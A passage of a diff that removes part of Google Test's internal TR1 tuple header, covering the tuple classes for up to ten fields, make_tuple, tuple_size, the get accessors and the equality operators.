-#define GTEST_BY_REF_(T) typename ::std::tr1::gtest_internal::ByRef<T>::type
-
-// AddRef<T>::type is T if T is a reference; otherwise it's T&.  This
-// is the same as tr1::add_reference<T>::type.
-template <typename T>
-struct AddRef { typedef T& type; };  // NOLINT
-template <typename T>
-struct AddRef<T&> { typedef T& type; };  // NOLINT
-
-// A handy wrapper for AddRef.
-#define GTEST_ADD_REF_(T) typename ::std::tr1::gtest_internal::AddRef<T>::type
-
-// A helper for implementing get<k>().
-template <int k> class Get;
-
-// A helper for implementing tuple_element<k, T>.  kIndexValid is true
-// iff k < the number of fields in tuple type T.
-template <bool kIndexValid, int kIndex, class Tuple>
-struct TupleElement;
-
-template <GTEST_10_TYPENAMES_(T)>
-struct TupleElement<true, 0, GTEST_10_TUPLE_(T) > {
-  typedef T0 type;
-};
-
-template <GTEST_10_TYPENAMES_(T)>
-struct TupleElement<true, 1, GTEST_10_TUPLE_(T) > {
-  typedef T1 type;
-};
-
-template <GTEST_10_TYPENAMES_(T)>
-struct TupleElement<true, 2, GTEST_10_TUPLE_(T) > {
-  typedef T2 type;
-};
-
-template <GTEST_10_TYPENAMES_(T)>
-struct TupleElement<true, 3, GTEST_10_TUPLE_(T) > {
-  typedef T3 type;
-};
-
-template <GTEST_10_TYPENAMES_(T)>
-struct TupleElement<true, 4, GTEST_10_TUPLE_(T) > {
-  typedef T4 type;
-};
-
-template <GTEST_10_TYPENAMES_(T)>
-struct TupleElement<true, 5, GTEST_10_TUPLE_(T) > {
-  typedef T5 type;
-};
-
-template <GTEST_10_TYPENAMES_(T)>
-struct TupleElement<true, 6, GTEST_10_TUPLE_(T) > {
-  typedef T6 type;
-};
-
-template <GTEST_10_TYPENAMES_(T)>
-struct TupleElement<true, 7, GTEST_10_TUPLE_(T) > {
-  typedef T7 type;
-};
-
-template <GTEST_10_TYPENAMES_(T)>
-struct TupleElement<true, 8, GTEST_10_TUPLE_(T) > {
-  typedef T8 type;
-};
-
-template <GTEST_10_TYPENAMES_(T)>
-struct TupleElement<true, 9, GTEST_10_TUPLE_(T) > {
-  typedef T9 type;
-};
-
-}  // namespace gtest_internal
-
-template <>
-class tuple<> {
- public:
-  tuple() {}
-  tuple(const tuple& /* t */)  {}
-  tuple& operator=(const tuple& /* t */) { return *this; }
-};
-
-template <GTEST_1_TYPENAMES_(T)>
-class GTEST_1_TUPLE_(T) {
- public:
-  template <int k> friend class gtest_internal::Get;
-
-  tuple() : f0_() {}
-
-  explicit tuple(GTEST_BY_REF_(T0) f0) : f0_(f0) {}
-
-  tuple(const tuple& t) : f0_(t.f0_) {}
-
-  template <GTEST_1_TYPENAMES_(U)>
-  tuple(const GTEST_1_TUPLE_(U)& t) : f0_(t.f0_) {}
-
-  tuple& operator=(const tuple& t) { return CopyFrom(t); }
-
-  template <GTEST_1_TYPENAMES_(U)>
-  tuple& operator=(const GTEST_1_TUPLE_(U)& t) {
-    return CopyFrom(t);
-  }
-
-  GTEST_DECLARE_TUPLE_AS_FRIEND_
-
-  template <GTEST_1_TYPENAMES_(U)>
-  tuple& CopyFrom(const GTEST_1_TUPLE_(U)& t) {
-    f0_ = t.f0_;
-    return *this;
-  }
-
-  T0 f0_;
-};
-
-template <GTEST_2_TYPENAMES_(T)>
-class GTEST_2_TUPLE_(T) {
- public:
-  template <int k> friend class gtest_internal::Get;
-
-  tuple() : f0_(), f1_() {}
-
-  explicit tuple(GTEST_BY_REF_(T0) f0, GTEST_BY_REF_(T1) f1) : f0_(f0),
-      f1_(f1) {}
-
-  tuple(const tuple& t) : f0_(t.f0_), f1_(t.f1_) {}
-
-  template <GTEST_2_TYPENAMES_(U)>
-  tuple(const GTEST_2_TUPLE_(U)& t) : f0_(t.f0_), f1_(t.f1_) {}
-  template <typename U0, typename U1>
-  tuple(const ::std::pair<U0, U1>& p) : f0_(p.first), f1_(p.second) {}
-
-  tuple& operator=(const tuple& t) { return CopyFrom(t); }
-
-  template <GTEST_2_TYPENAMES_(U)>
-  tuple& operator=(const GTEST_2_TUPLE_(U)& t) {
-    return CopyFrom(t);
-  }
-  template <typename U0, typename U1>
-  tuple& operator=(const ::std::pair<U0, U1>& p) {
-    f0_ = p.first;
-    f1_ = p.second;
-    return *this;
-  }
-
-  GTEST_DECLARE_TUPLE_AS_FRIEND_
-
-  template <GTEST_2_TYPENAMES_(U)>
-  tuple& CopyFrom(const GTEST_2_TUPLE_(U)& t) {
-    f0_ = t.f0_;
-    f1_ = t.f1_;
-    return *this;
-  }
-
-  T0 f0_;
-  T1 f1_;
-};
-
-template <GTEST_3_TYPENAMES_(T)>
-class GTEST_3_TUPLE_(T) {
- public:
-  template <int k> friend class gtest_internal::Get;
-
-  tuple() : f0_(), f1_(), f2_() {}
-
-  explicit tuple(GTEST_BY_REF_(T0) f0, GTEST_BY_REF_(T1) f1,
-      GTEST_BY_REF_(T2) f2) : f0_(f0), f1_(f1), f2_(f2) {}
-
-  tuple(const tuple& t) : f0_(t.f0_), f1_(t.f1_), f2_(t.f2_) {}
-
-  template <GTEST_3_TYPENAMES_(U)>
-  tuple(const GTEST_3_TUPLE_(U)& t) : f0_(t.f0_), f1_(t.f1_), f2_(t.f2_) {}
-
-  tuple& operator=(const tuple& t) { return CopyFrom(t); }
-
-  template <GTEST_3_TYPENAMES_(U)>
-  tuple& operator=(const GTEST_3_TUPLE_(U)& t) {
-    return CopyFrom(t);
-  }
-
-  GTEST_DECLARE_TUPLE_AS_FRIEND_
-
-  template <GTEST_3_TYPENAMES_(U)>
-  tuple& CopyFrom(const GTEST_3_TUPLE_(U)& t) {
-    f0_ = t.f0_;
-    f1_ = t.f1_;
-    f2_ = t.f2_;
-    return *this;
-  }
-
-  T0 f0_;
-  T1 f1_;
-  T2 f2_;
-};
-
-template <GTEST_4_TYPENAMES_(T)>
-class GTEST_4_TUPLE_(T) {
- public:
-  template <int k> friend class gtest_internal::Get;
-
-  tuple() : f0_(), f1_(), f2_(), f3_() {}
-
-  explicit tuple(GTEST_BY_REF_(T0) f0, GTEST_BY_REF_(T1) f1,
-      GTEST_BY_REF_(T2) f2, GTEST_BY_REF_(T3) f3) : f0_(f0), f1_(f1), f2_(f2),
-      f3_(f3) {}
-
-  tuple(const tuple& t) : f0_(t.f0_), f1_(t.f1_), f2_(t.f2_), f3_(t.f3_) {}
-
-  template <GTEST_4_TYPENAMES_(U)>
-  tuple(const GTEST_4_TUPLE_(U)& t) : f0_(t.f0_), f1_(t.f1_), f2_(t.f2_),
-      f3_(t.f3_) {}
-
-  tuple& operator=(const tuple& t) { return CopyFrom(t); }
-
-  template <GTEST_4_TYPENAMES_(U)>
-  tuple& operator=(const GTEST_4_TUPLE_(U)& t) {
-    return CopyFrom(t);
-  }
-
-  GTEST_DECLARE_TUPLE_AS_FRIEND_
-
-  template <GTEST_4_TYPENAMES_(U)>
-  tuple& CopyFrom(const GTEST_4_TUPLE_(U)& t) {
-    f0_ = t.f0_;
-    f1_ = t.f1_;
-    f2_ = t.f2_;
-    f3_ = t.f3_;
-    return *this;
-  }
-
-  T0 f0_;
-  T1 f1_;
-  T2 f2_;
-  T3 f3_;
-};
-
-template <GTEST_5_TYPENAMES_(T)>
-class GTEST_5_TUPLE_(T) {
- public:
-  template <int k> friend class gtest_internal::Get;
-
-  tuple() : f0_(), f1_(), f2_(), f3_(), f4_() {}
-
-  explicit tuple(GTEST_BY_REF_(T0) f0, GTEST_BY_REF_(T1) f1,
-      GTEST_BY_REF_(T2) f2, GTEST_BY_REF_(T3) f3,
-      GTEST_BY_REF_(T4) f4) : f0_(f0), f1_(f1), f2_(f2), f3_(f3), f4_(f4) {}
-
-  tuple(const tuple& t) : f0_(t.f0_), f1_(t.f1_), f2_(t.f2_), f3_(t.f3_),
-      f4_(t.f4_) {}
-
-  template <GTEST_5_TYPENAMES_(U)>
-  tuple(const GTEST_5_TUPLE_(U)& t) : f0_(t.f0_), f1_(t.f1_), f2_(t.f2_),
-      f3_(t.f3_), f4_(t.f4_) {}
-
-  tuple& operator=(const tuple& t) { return CopyFrom(t); }
-
-  template <GTEST_5_TYPENAMES_(U)>
-  tuple& operator=(const GTEST_5_TUPLE_(U)& t) {
-    return CopyFrom(t);
-  }
-
-  GTEST_DECLARE_TUPLE_AS_FRIEND_
-
-  template <GTEST_5_TYPENAMES_(U)>
-  tuple& CopyFrom(const GTEST_5_TUPLE_(U)& t) {
-    f0_ = t.f0_;
-    f1_ = t.f1_;
-    f2_ = t.f2_;
-    f3_ = t.f3_;
-    f4_ = t.f4_;
-    return *this;
-  }
-
-  T0 f0_;
-  T1 f1_;
-  T2 f2_;
-  T3 f3_;
-  T4 f4_;
-};
-
-template <GTEST_6_TYPENAMES_(T)>
-class GTEST_6_TUPLE_(T) {
- public:
-  template <int k> friend class gtest_internal::Get;
-
-  tuple() : f0_(), f1_(), f2_(), f3_(), f4_(), f5_() {}
-
-  explicit tuple(GTEST_BY_REF_(T0) f0, GTEST_BY_REF_(T1) f1,
-      GTEST_BY_REF_(T2) f2, GTEST_BY_REF_(T3) f3, GTEST_BY_REF_(T4) f4,
-      GTEST_BY_REF_(T5) f5) : f0_(f0), f1_(f1), f2_(f2), f3_(f3), f4_(f4),
-      f5_(f5) {}
-
-  tuple(const tuple& t) : f0_(t.f0_), f1_(t.f1_), f2_(t.f2_), f3_(t.f3_),
-      f4_(t.f4_), f5_(t.f5_) {}
-
-  template <GTEST_6_TYPENAMES_(U)>
-  tuple(const GTEST_6_TUPLE_(U)& t) : f0_(t.f0_), f1_(t.f1_), f2_(t.f2_),
-      f3_(t.f3_), f4_(t.f4_), f5_(t.f5_) {}
-
-  tuple& operator=(const tuple& t) { return CopyFrom(t); }
-
-  template <GTEST_6_TYPENAMES_(U)>
-  tuple& operator=(const GTEST_6_TUPLE_(U)& t) {
-    return CopyFrom(t);
-  }
-
-  GTEST_DECLARE_TUPLE_AS_FRIEND_
-
-  template <GTEST_6_TYPENAMES_(U)>
-  tuple& CopyFrom(const GTEST_6_TUPLE_(U)& t) {
-    f0_ = t.f0_;
-    f1_ = t.f1_;
-    f2_ = t.f2_;
-    f3_ = t.f3_;
-    f4_ = t.f4_;
-    f5_ = t.f5_;
-    return *this;
-  }
-
-  T0 f0_;
-  T1 f1_;
-  T2 f2_;
-  T3 f3_;
-  T4 f4_;
-  T5 f5_;
-};
-
-template <GTEST_7_TYPENAMES_(T)>
-class GTEST_7_TUPLE_(T) {
- public:
-  template <int k> friend class gtest_internal::Get;
-
-  tuple() : f0_(), f1_(), f2_(), f3_(), f4_(), f5_(), f6_() {}
-
-  explicit tuple(GTEST_BY_REF_(T0) f0, GTEST_BY_REF_(T1) f1,
-      GTEST_BY_REF_(T2) f2, GTEST_BY_REF_(T3) f3, GTEST_BY_REF_(T4) f4,
-      GTEST_BY_REF_(T5) f5, GTEST_BY_REF_(T6) f6) : f0_(f0), f1_(f1), f2_(f2),
-      f3_(f3), f4_(f4), f5_(f5), f6_(f6) {}
-
-  tuple(const tuple& t) : f0_(t.f0_), f1_(t.f1_), f2_(t.f2_), f3_(t.f3_),
-      f4_(t.f4_), f5_(t.f5_), f6_(t.f6_) {}
-
-  template <GTEST_7_TYPENAMES_(U)>
-  tuple(const GTEST_7_TUPLE_(U)& t) : f0_(t.f0_), f1_(t.f1_), f2_(t.f2_),
-      f3_(t.f3_), f4_(t.f4_), f5_(t.f5_), f6_(t.f6_) {}
-
-  tuple& operator=(const tuple& t) { return CopyFrom(t); }
-
-  template <GTEST_7_TYPENAMES_(U)>
-  tuple& operator=(const GTEST_7_TUPLE_(U)& t) {
-    return CopyFrom(t);
-  }
-
-  GTEST_DECLARE_TUPLE_AS_FRIEND_
-
-  template <GTEST_7_TYPENAMES_(U)>
-  tuple& CopyFrom(const GTEST_7_TUPLE_(U)& t) {
-    f0_ = t.f0_;
-    f1_ = t.f1_;
-    f2_ = t.f2_;
-    f3_ = t.f3_;
-    f4_ = t.f4_;
-    f5_ = t.f5_;
-    f6_ = t.f6_;
-    return *this;
-  }
-
-  T0 f0_;
-  T1 f1_;
-  T2 f2_;
-  T3 f3_;
-  T4 f4_;
-  T5 f5_;
-  T6 f6_;
-};
-
-template <GTEST_8_TYPENAMES_(T)>
-class GTEST_8_TUPLE_(T) {
- public:
-  template <int k> friend class gtest_internal::Get;
-
-  tuple() : f0_(), f1_(), f2_(), f3_(), f4_(), f5_(), f6_(), f7_() {}
-
-  explicit tuple(GTEST_BY_REF_(T0) f0, GTEST_BY_REF_(T1) f1,
-      GTEST_BY_REF_(T2) f2, GTEST_BY_REF_(T3) f3, GTEST_BY_REF_(T4) f4,
-      GTEST_BY_REF_(T5) f5, GTEST_BY_REF_(T6) f6,
-      GTEST_BY_REF_(T7) f7) : f0_(f0), f1_(f1), f2_(f2), f3_(f3), f4_(f4),
-      f5_(f5), f6_(f6), f7_(f7) {}
-
-  tuple(const tuple& t) : f0_(t.f0_), f1_(t.f1_), f2_(t.f2_), f3_(t.f3_),
-      f4_(t.f4_), f5_(t.f5_), f6_(t.f6_), f7_(t.f7_) {}
-
-  template <GTEST_8_TYPENAMES_(U)>
-  tuple(const GTEST_8_TUPLE_(U)& t) : f0_(t.f0_), f1_(t.f1_), f2_(t.f2_),
-      f3_(t.f3_), f4_(t.f4_), f5_(t.f5_), f6_(t.f6_), f7_(t.f7_) {}
-
-  tuple& operator=(const tuple& t) { return CopyFrom(t); }
-
-  template <GTEST_8_TYPENAMES_(U)>
-  tuple& operator=(const GTEST_8_TUPLE_(U)& t) {
-    return CopyFrom(t);
-  }
-
-  GTEST_DECLARE_TUPLE_AS_FRIEND_
-
-  template <GTEST_8_TYPENAMES_(U)>
-  tuple& CopyFrom(const GTEST_8_TUPLE_(U)& t) {
-    f0_ = t.f0_;
-    f1_ = t.f1_;
-    f2_ = t.f2_;
-    f3_ = t.f3_;
-    f4_ = t.f4_;
-    f5_ = t.f5_;
-    f6_ = t.f6_;
-    f7_ = t.f7_;
-    return *this;
-  }
-
-  T0 f0_;
-  T1 f1_;
-  T2 f2_;
-  T3 f3_;
-  T4 f4_;
-  T5 f5_;
-  T6 f6_;
-  T7 f7_;
-};
-
-template <GTEST_9_TYPENAMES_(T)>
-class GTEST_9_TUPLE_(T) {
- public:
-  template <int k> friend class gtest_internal::Get;
-
-  tuple() : f0_(), f1_(), f2_(), f3_(), f4_(), f5_(), f6_(), f7_(), f8_() {}
-
-  explicit tuple(GTEST_BY_REF_(T0) f0, GTEST_BY_REF_(T1) f1,
-      GTEST_BY_REF_(T2) f2, GTEST_BY_REF_(T3) f3, GTEST_BY_REF_(T4) f4,
-      GTEST_BY_REF_(T5) f5, GTEST_BY_REF_(T6) f6, GTEST_BY_REF_(T7) f7,
-      GTEST_BY_REF_(T8) f8) : f0_(f0), f1_(f1), f2_(f2), f3_(f3), f4_(f4),
-      f5_(f5), f6_(f6), f7_(f7), f8_(f8) {}
-
-  tuple(const tuple& t) : f0_(t.f0_), f1_(t.f1_), f2_(t.f2_), f3_(t.f3_),
-      f4_(t.f4_), f5_(t.f5_), f6_(t.f6_), f7_(t.f7_), f8_(t.f8_) {}
-
-  template <GTEST_9_TYPENAMES_(U)>
-  tuple(const GTEST_9_TUPLE_(U)& t) : f0_(t.f0_), f1_(t.f1_), f2_(t.f2_),
-      f3_(t.f3_), f4_(t.f4_), f5_(t.f5_), f6_(t.f6_), f7_(t.f7_), f8_(t.f8_) {}
-
-  tuple& operator=(const tuple& t) { return CopyFrom(t); }
-
-  template <GTEST_9_TYPENAMES_(U)>
-  tuple& operator=(const GTEST_9_TUPLE_(U)& t) {
-    return CopyFrom(t);
-  }
-
-  GTEST_DECLARE_TUPLE_AS_FRIEND_
-
-  template <GTEST_9_TYPENAMES_(U)>
-  tuple& CopyFrom(const GTEST_9_TUPLE_(U)& t) {
-    f0_ = t.f0_;
-    f1_ = t.f1_;
-    f2_ = t.f2_;
-    f3_ = t.f3_;
-    f4_ = t.f4_;
-    f5_ = t.f5_;
-    f6_ = t.f6_;
-    f7_ = t.f7_;
-    f8_ = t.f8_;
-    return *this;
-  }
-
-  T0 f0_;
-  T1 f1_;
-  T2 f2_;
-  T3 f3_;
-  T4 f4_;
-  T5 f5_;
-  T6 f6_;
-  T7 f7_;
-  T8 f8_;
-};
-
-template <GTEST_10_TYPENAMES_(T)>
-class tuple {
- public:
-  template <int k> friend class gtest_internal::Get;
-
-  tuple() : f0_(), f1_(), f2_(), f3_(), f4_(), f5_(), f6_(), f7_(), f8_(),
-      f9_() {}
-
-  explicit tuple(GTEST_BY_REF_(T0) f0, GTEST_BY_REF_(T1) f1,
-      GTEST_BY_REF_(T2) f2, GTEST_BY_REF_(T3) f3, GTEST_BY_REF_(T4) f4,
-      GTEST_BY_REF_(T5) f5, GTEST_BY_REF_(T6) f6, GTEST_BY_REF_(T7) f7,
-      GTEST_BY_REF_(T8) f8, GTEST_BY_REF_(T9) f9) : f0_(f0), f1_(f1), f2_(f2),
-      f3_(f3), f4_(f4), f5_(f5), f6_(f6), f7_(f7), f8_(f8), f9_(f9) {}
-
-  tuple(const tuple& t) : f0_(t.f0_), f1_(t.f1_), f2_(t.f2_), f3_(t.f3_),
-      f4_(t.f4_), f5_(t.f5_), f6_(t.f6_), f7_(t.f7_), f8_(t.f8_), f9_(t.f9_) {}
-
-  template <GTEST_10_TYPENAMES_(U)>
-  tuple(const GTEST_10_TUPLE_(U)& t) : f0_(t.f0_), f1_(t.f1_), f2_(t.f2_),
-      f3_(t.f3_), f4_(t.f4_), f5_(t.f5_), f6_(t.f6_), f7_(t.f7_), f8_(t.f8_),
-      f9_(t.f9_) {}
-
-  tuple& operator=(const tuple& t) { return CopyFrom(t); }
-
-  template <GTEST_10_TYPENAMES_(U)>
-  tuple& operator=(const GTEST_10_TUPLE_(U)& t) {
-    return CopyFrom(t);
-  }
-
-  GTEST_DECLARE_TUPLE_AS_FRIEND_
-
-  template <GTEST_10_TYPENAMES_(U)>
-  tuple& CopyFrom(const GTEST_10_TUPLE_(U)& t) {
-    f0_ = t.f0_;
-    f1_ = t.f1_;
-    f2_ = t.f2_;
-    f3_ = t.f3_;
-    f4_ = t.f4_;
-    f5_ = t.f5_;
-    f6_ = t.f6_;
-    f7_ = t.f7_;
-    f8_ = t.f8_;
-    f9_ = t.f9_;
-    return *this;
-  }
-
-  T0 f0_;
-  T1 f1_;
-  T2 f2_;
-  T3 f3_;
-  T4 f4_;
-  T5 f5_;
-  T6 f6_;
-  T7 f7_;
-  T8 f8_;
-  T9 f9_;
-};
-
-// 6.1.3.2 Tuple creation functions.
-
-// Known limitations: we don't support passing an
-// std::tr1::reference_wrapper<T> to make_tuple().  And we don't
-// implement tie().
-
-inline tuple<> make_tuple() { return tuple<>(); }
-
-template <GTEST_1_TYPENAMES_(T)>
-inline GTEST_1_TUPLE_(T) make_tuple(const T0& f0) {
-  return GTEST_1_TUPLE_(T)(f0);
-}
-
-template <GTEST_2_TYPENAMES_(T)>
-inline GTEST_2_TUPLE_(T) make_tuple(const T0& f0, const T1& f1) {
-  return GTEST_2_TUPLE_(T)(f0, f1);
-}
-
-template <GTEST_3_TYPENAMES_(T)>
-inline GTEST_3_TUPLE_(T) make_tuple(const T0& f0, const T1& f1, const T2& f2) {
-  return GTEST_3_TUPLE_(T)(f0, f1, f2);
-}
-
-template <GTEST_4_TYPENAMES_(T)>
-inline GTEST_4_TUPLE_(T) make_tuple(const T0& f0, const T1& f1, const T2& f2,
-    const T3& f3) {
-  return GTEST_4_TUPLE_(T)(f0, f1, f2, f3);
-}
-
-template <GTEST_5_TYPENAMES_(T)>
-inline GTEST_5_TUPLE_(T) make_tuple(const T0& f0, const T1& f1, const T2& f2,
-    const T3& f3, const T4& f4) {
-  return GTEST_5_TUPLE_(T)(f0, f1, f2, f3, f4);
-}
-
-template <GTEST_6_TYPENAMES_(T)>
-inline GTEST_6_TUPLE_(T) make_tuple(const T0& f0, const T1& f1, const T2& f2,
-    const T3& f3, const T4& f4, const T5& f5) {
-  return GTEST_6_TUPLE_(T)(f0, f1, f2, f3, f4, f5);
-}
-
-template <GTEST_7_TYPENAMES_(T)>
-inline GTEST_7_TUPLE_(T) make_tuple(const T0& f0, const T1& f1, const T2& f2,
-    const T3& f3, const T4& f4, const T5& f5, const T6& f6) {
-  return GTEST_7_TUPLE_(T)(f0, f1, f2, f3, f4, f5, f6);
-}
-
-template <GTEST_8_TYPENAMES_(T)>
-inline GTEST_8_TUPLE_(T) make_tuple(const T0& f0, const T1& f1, const T2& f2,
-    const T3& f3, const T4& f4, const T5& f5, const T6& f6, const T7& f7) {
-  return GTEST_8_TUPLE_(T)(f0, f1, f2, f3, f4, f5, f6, f7);
-}
-
-template <GTEST_9_TYPENAMES_(T)>
-inline GTEST_9_TUPLE_(T) make_tuple(const T0& f0, const T1& f1, const T2& f2,
-    const T3& f3, const T4& f4, const T5& f5, const T6& f6, const T7& f7,
-    const T8& f8) {
-  return GTEST_9_TUPLE_(T)(f0, f1, f2, f3, f4, f5, f6, f7, f8);
-}
-
-template <GTEST_10_TYPENAMES_(T)>
-inline GTEST_10_TUPLE_(T) make_tuple(const T0& f0, const T1& f1, const T2& f2,
-    const T3& f3, const T4& f4, const T5& f5, const T6& f6, const T7& f7,
-    const T8& f8, const T9& f9) {
-  return GTEST_10_TUPLE_(T)(f0, f1, f2, f3, f4, f5, f6, f7, f8, f9);
-}
-
-// 6.1.3.3 Tuple helper classes.
-
-template <typename Tuple> struct tuple_size;
-
-template <GTEST_0_TYPENAMES_(T)>
-struct tuple_size<GTEST_0_TUPLE_(T) > {
-  static const int value = 0;
-};
-
-template <GTEST_1_TYPENAMES_(T)>
-struct tuple_size<GTEST_1_TUPLE_(T) > {
-  static const int value = 1;
-};
-
-template <GTEST_2_TYPENAMES_(T)>
-struct tuple_size<GTEST_2_TUPLE_(T) > {
-  static const int value = 2;
-};
-
-template <GTEST_3_TYPENAMES_(T)>
-struct tuple_size<GTEST_3_TUPLE_(T) > {
-  static const int value = 3;
-};
-
-template <GTEST_4_TYPENAMES_(T)>
-struct tuple_size<GTEST_4_TUPLE_(T) > {
-  static const int value = 4;
-};
-
-template <GTEST_5_TYPENAMES_(T)>
-struct tuple_size<GTEST_5_TUPLE_(T) > {
-  static const int value = 5;
-};
-
-template <GTEST_6_TYPENAMES_(T)>
-struct tuple_size<GTEST_6_TUPLE_(T) > {
-  static const int value = 6;
-};
-
-template <GTEST_7_TYPENAMES_(T)>
-struct tuple_size<GTEST_7_TUPLE_(T) > {
-  static const int value = 7;
-};
-
-template <GTEST_8_TYPENAMES_(T)>
-struct tuple_size<GTEST_8_TUPLE_(T) > {
-  static const int value = 8;
-};
-
-template <GTEST_9_TYPENAMES_(T)>
-struct tuple_size<GTEST_9_TUPLE_(T) > {
-  static const int value = 9;
-};
-
-template <GTEST_10_TYPENAMES_(T)>
-struct tuple_size<GTEST_10_TUPLE_(T) > {
-  static const int value = 10;
-};
-
-template <int k, class Tuple>
-struct tuple_element {
-  typedef typename gtest_internal::TupleElement<
-      k < (tuple_size<Tuple>::value), k, Tuple>::type type;
-};
-
-#define GTEST_TUPLE_ELEMENT_(k, Tuple) typename tuple_element<k, Tuple >::type
-
-// 6.1.3.4 Element access.
-
-namespace gtest_internal {
-
-template <>
-class Get<0> {
- public:
-  template <class Tuple>
-  static GTEST_ADD_REF_(GTEST_TUPLE_ELEMENT_(0, Tuple))
-  Field(Tuple& t) { return t.f0_; }  // NOLINT
-
-  template <class Tuple>
-  static GTEST_BY_REF_(GTEST_TUPLE_ELEMENT_(0, Tuple))
-  ConstField(const Tuple& t) { return t.f0_; }
-};
-
-template <>
-class Get<1> {
- public:
-  template <class Tuple>
-  static GTEST_ADD_REF_(GTEST_TUPLE_ELEMENT_(1, Tuple))
-  Field(Tuple& t) { return t.f1_; }  // NOLINT
-
-  template <class Tuple>
-  static GTEST_BY_REF_(GTEST_TUPLE_ELEMENT_(1, Tuple))
-  ConstField(const Tuple& t) { return t.f1_; }
-};
-
-template <>
-class Get<2> {
- public:
-  template <class Tuple>
-  static GTEST_ADD_REF_(GTEST_TUPLE_ELEMENT_(2, Tuple))
-  Field(Tuple& t) { return t.f2_; }  // NOLINT
-
-  template <class Tuple>
-  static GTEST_BY_REF_(GTEST_TUPLE_ELEMENT_(2, Tuple))
-  ConstField(const Tuple& t) { return t.f2_; }
-};
-
-template <>
-class Get<3> {
- public:
-  template <class Tuple>
-  static GTEST_ADD_REF_(GTEST_TUPLE_ELEMENT_(3, Tuple))
-  Field(Tuple& t) { return t.f3_; }  // NOLINT
-
-  template <class Tuple>
-  static GTEST_BY_REF_(GTEST_TUPLE_ELEMENT_(3, Tuple))
-  ConstField(const Tuple& t) { return t.f3_; }
-};
-
-template <>
-class Get<4> {
- public:
-  template <class Tuple>
-  static GTEST_ADD_REF_(GTEST_TUPLE_ELEMENT_(4, Tuple))
-  Field(Tuple& t) { return t.f4_; }  // NOLINT
-
-  template <class Tuple>
-  static GTEST_BY_REF_(GTEST_TUPLE_ELEMENT_(4, Tuple))
-  ConstField(const Tuple& t) { return t.f4_; }
-};
-
-template <>
-class Get<5> {
- public:
-  template <class Tuple>
-  static GTEST_ADD_REF_(GTEST_TUPLE_ELEMENT_(5, Tuple))
-  Field(Tuple& t) { return t.f5_; }  // NOLINT
-
-  template <class Tuple>
-  static GTEST_BY_REF_(GTEST_TUPLE_ELEMENT_(5, Tuple))
-  ConstField(const Tuple& t) { return t.f5_; }
-};
-
-template <>
-class Get<6> {
- public:
-  template <class Tuple>
-  static GTEST_ADD_REF_(GTEST_TUPLE_ELEMENT_(6, Tuple))
-  Field(Tuple& t) { return t.f6_; }  // NOLINT
-
-  template <class Tuple>
-  static GTEST_BY_REF_(GTEST_TUPLE_ELEMENT_(6, Tuple))
-  ConstField(const Tuple& t) { return t.f6_; }
-};
-
-template <>
-class Get<7> {
- public:
-  template <class Tuple>
-  static GTEST_ADD_REF_(GTEST_TUPLE_ELEMENT_(7, Tuple))
-  Field(Tuple& t) { return t.f7_; }  // NOLINT
-
-  template <class Tuple>
-  static GTEST_BY_REF_(GTEST_TUPLE_ELEMENT_(7, Tuple))
-  ConstField(const Tuple& t) { return t.f7_; }
-};
-
-template <>
-class Get<8> {
- public:
-  template <class Tuple>
-  static GTEST_ADD_REF_(GTEST_TUPLE_ELEMENT_(8, Tuple))
-  Field(Tuple& t) { return t.f8_; }  // NOLINT
-
-  template <class Tuple>
-  static GTEST_BY_REF_(GTEST_TUPLE_ELEMENT_(8, Tuple))
-  ConstField(const Tuple& t) { return t.f8_; }
-};
-
-template <>
-class Get<9> {
- public:
-  template <class Tuple>
-  static GTEST_ADD_REF_(GTEST_TUPLE_ELEMENT_(9, Tuple))
-  Field(Tuple& t) { return t.f9_; }  // NOLINT
-
-  template <class Tuple>
-  static GTEST_BY_REF_(GTEST_TUPLE_ELEMENT_(9, Tuple))
-  ConstField(const Tuple& t) { return t.f9_; }
-};
-
-}  // namespace gtest_internal
-
-template <int k, GTEST_10_TYPENAMES_(T)>
-GTEST_ADD_REF_(GTEST_TUPLE_ELEMENT_(k, GTEST_10_TUPLE_(T)))
-get(GTEST_10_TUPLE_(T)& t) {
-  return gtest_internal::Get<k>::Field(t);
-}
-
-template <int k, GTEST_10_TYPENAMES_(T)>
-GTEST_BY_REF_(GTEST_TUPLE_ELEMENT_(k,  GTEST_10_TUPLE_(T)))
-get(const GTEST_10_TUPLE_(T)& t) {
-  return gtest_internal::Get<k>::ConstField(t);
-}
-
-// 6.1.3.5 Relational operators
-
-// We only implement == and !=, as we don't have a need for the rest yet.
-
-namespace gtest_internal {
-
-// SameSizeTuplePrefixComparator<k, k>::Eq(t1, t2) returns true if the
-// first k fields of t1 equals the first k fields of t2.
-// SameSizeTuplePrefixComparator(k1, k2) would be a compiler error if
-// k1 != k2.
-template <int kSize1, int kSize2>
-struct SameSizeTuplePrefixComparator;
-
-template <>
-struct SameSizeTuplePrefixComparator<0, 0> {
-  template <class Tuple1, class Tuple2>
-  static bool Eq(const Tuple1& /* t1 */, const Tuple2& /* t2 */) {
-    return true;
-  }
-};
-
-template <int k>
-struct SameSizeTuplePrefixComparator<k, k> {
-  template <class Tuple1, class Tuple2>
-  static bool Eq(const Tuple1& t1, const Tuple2& t2) {
-    return SameSizeTuplePrefixComparator<k - 1, k - 1>::Eq(t1, t2) &&
-        ::std::tr1::get<k - 1>(t1) == ::std::tr1::get<k - 1>(t2);
-  }
-};
-
-}  // namespace gtest_internal
-
-template <GTEST_10_TYPENAMES_(T), GTEST_10_TYPENAMES_(U)>
-inline bool operator==(const GTEST_10_TUPLE_(T)& t,
-                       const GTEST_10_TUPLE_(U)& u) {
-  return gtest_internal::SameSizeTuplePrefixComparator<
-      tuple_size<GTEST_10_TUPLE_(T) >::value,
-      tuple_size<GTEST_10_TUPLE_(U) >::value>::Eq(t, u);
-}
-
-template <GTEST_10_TYPENAMES_(T), GTEST_10_TYPENAMES_(U)>
-inline bool operator!=(const GTEST_10_TUPLE_(T)& t,
-                       const GTEST_10_TUPLE_(U)& u) { return !(t == u); }
-
-// 6.1.4 Pairs.
-// Unimplemented.
-
-}  // namespace tr1
-}  // namespace std
-
-#undef GTEST_0_TUPLE_
-#undef GTEST_1_TUPLE_
-#undef GTEST_2_TUPLE_
-#undef GTEST_3_TUPLE_
-#undef GTEST_4_TUPLE_
-#undef GTEST_5_TUPLE_
-#undef GTEST_6_TUPLE_
-#undef GTEST_7_TUPLE_
-#undef GTEST_8_TUPLE_
-#undef GTEST_9_TUPLE_
-#undef GTEST_10_TUPLE_
-
-#undef GTEST_0_TYPENAMES_
-#undef GTEST_1_TYPENAMES_
-#undef GTEST_2_TYPENAMES_
-#undef GTEST_3_TYPENAMES_
